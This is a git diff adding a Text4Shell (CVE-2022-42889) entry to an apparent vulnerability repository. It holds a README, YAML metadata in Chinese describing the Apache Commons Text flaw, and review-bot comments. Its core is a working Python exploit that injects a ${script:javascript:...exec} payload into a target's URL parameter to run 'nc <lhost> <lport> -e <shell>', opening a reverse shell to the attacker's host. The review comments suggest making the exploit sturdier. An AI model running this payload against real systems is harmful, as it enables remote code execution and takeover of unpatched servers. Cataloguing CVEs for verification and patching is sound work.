diff --git a/cve/apache-commons-text/2022/CVE-2022-42889/README.md b/cve/apache-commons-text/2022/CVE-2022-42889/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..3ddbbd0a1d3b4b6dbc5b68d508fdfbcce3df929e
--- /dev/null
+++ b/cve/apache-commons-text/2022/CVE-2022-42889/README.md
@@ -0,0 +1,2 @@
+# CVE-2022-42889-Text4Shell-Exploit-POC
+CVE-2022-42889 Text4Shell Exploit POC
diff --git a/cve/apache-commons-text/2022/CVE-2022-42889/text4shell_exploit.py b/cve/apache-commons-text/2022/CVE-2022-42889/text4shell_exploit.py
new file mode 100644
index 0000000000000000000000000000000000000000..a7776571b3b237180b5310da586da6953a8acc23
--- /dev/null
+++ b/cve/apache-commons-text/2022/CVE-2022-42889/text4shell_exploit.py
@@ -0,0 +1,20 @@
+import requests
+import sys
+
+if(len(sys.argv) != 6):
+ print("Usage: python3 exploit.py ")
+ sys.exit(0)
+
+URL = sys.argv[1]
+param_name = sys.argv[2]
+lhost = sys.argv[3]
+lport = sys.argv[4]
+type = sys.argv[5]
+
+cmd = "nc " + lhost + " " + lport + " -e " + type
+payload="${script:javascript:java.lang.Runtime.getRuntime().exec('" + cmd + "')}"
+
+PARAMS = {param_name:payload}
+
+r = requests.get(url = URL, params = PARAMS)
+print(r.text)
diff --git a/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml b/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..991427c4e1db623fab13bf03fd2c1b384bd8296b
--- /dev/null
+++ b/cve/apache-commons-text/2022/yaml/CVE-2022-42889.yaml
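Review bot: The usage branch in text4shell_exploit.py prints `Usage: python3 exploit.py ` with no argument names (they may have been lost in rendering) and a script name that does not match the file, then calls `sys.exit(0)`, so a wrapper cannot tell a usage error from a completed run; list the five positional arguments in the message and use `sys.exit(1)`. `type = sys.argv[5]` shadows the builtin `type`; a descriptive name such as `shell_path` avoids that. `requests.get(url = URL, params = PARAMS)` sets no `timeout`, so the script blocks indefinitely when the host does not answer; pass `timeout=10` or similar. The file also has no header comment; one line such as `# Verification PoC for CVE-2022-42889: script-lookup interpolation in Apache Commons Text 1.5-1.9, fixed in 1.10.0` would tell a reader what is being checked and which release closes it.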
@@ -0,0 +1,20 @@
+id: CVE-2022-42889
+source: https://github.com/rhitikwadhvana/CVE-2022-42889-Text4Shell-Exploit-POC
+info:
+ name: Apache Commons Text项目实现了一系列关于文本字符串的算法,专注于处理字符串和文本块。
+ severity: CRITICAL
+ description:
+ Apache Commons Text 1.10.0版本之前允许对文本进行相关的变量解析。在Apache Commons Text版本1.5~1.9中,攻击者可构造恶意文本,由于不安全的插值默认值,当输入的参数不受信任时,可能导致远程代码执行。
+ scope-of-influence:
+ 1.5 <= Apache Commons Text <= 1.9
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-42889
+ - https://zhuanlan.zhihu.com/p/575580463
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-42889
+ cwe-id: CWE-94
+ cnvd-id: None
+ kve-id: None
+ tags: CVE-2022, Apache Commons Text
\ No newline at end of file
diff --git a/other_list.yaml b/other_list.yaml
index bab8348fc38e126c13b33e5b542674e8498cb62a..5b5909a9fccc7ce9e8b2b7b246d51c96a9a8a0cd 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -23,6 +23,8 @@ cve:
 - CVE-2021-1056
 java-spring-cloud-gateway:
 - CVE-2022-22947
+ apache-commons-text:
+ - CVE-2022-42889
 unzip:
 - CVE-2022-0529
 cnvd:
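Review bot: The `description` in CVE-2022-42889.yaml gives the affected range and the impact but no remediation, which is the next thing a reader triaging this entry needs; add that upgrading to Commons Text 1.10.0 resolves it, since that release no longer enables the `script`, `dns` and `url` lookups by default. `cnvd-id: None` and `kve-id: None` are plain YAML scalars and load as the string `None` rather than a null, so a consumer testing for absence will see a value; `cnvd-id: null` or omitting the key would be safer, subject to the repository's schema. The file also ends without a trailing newline.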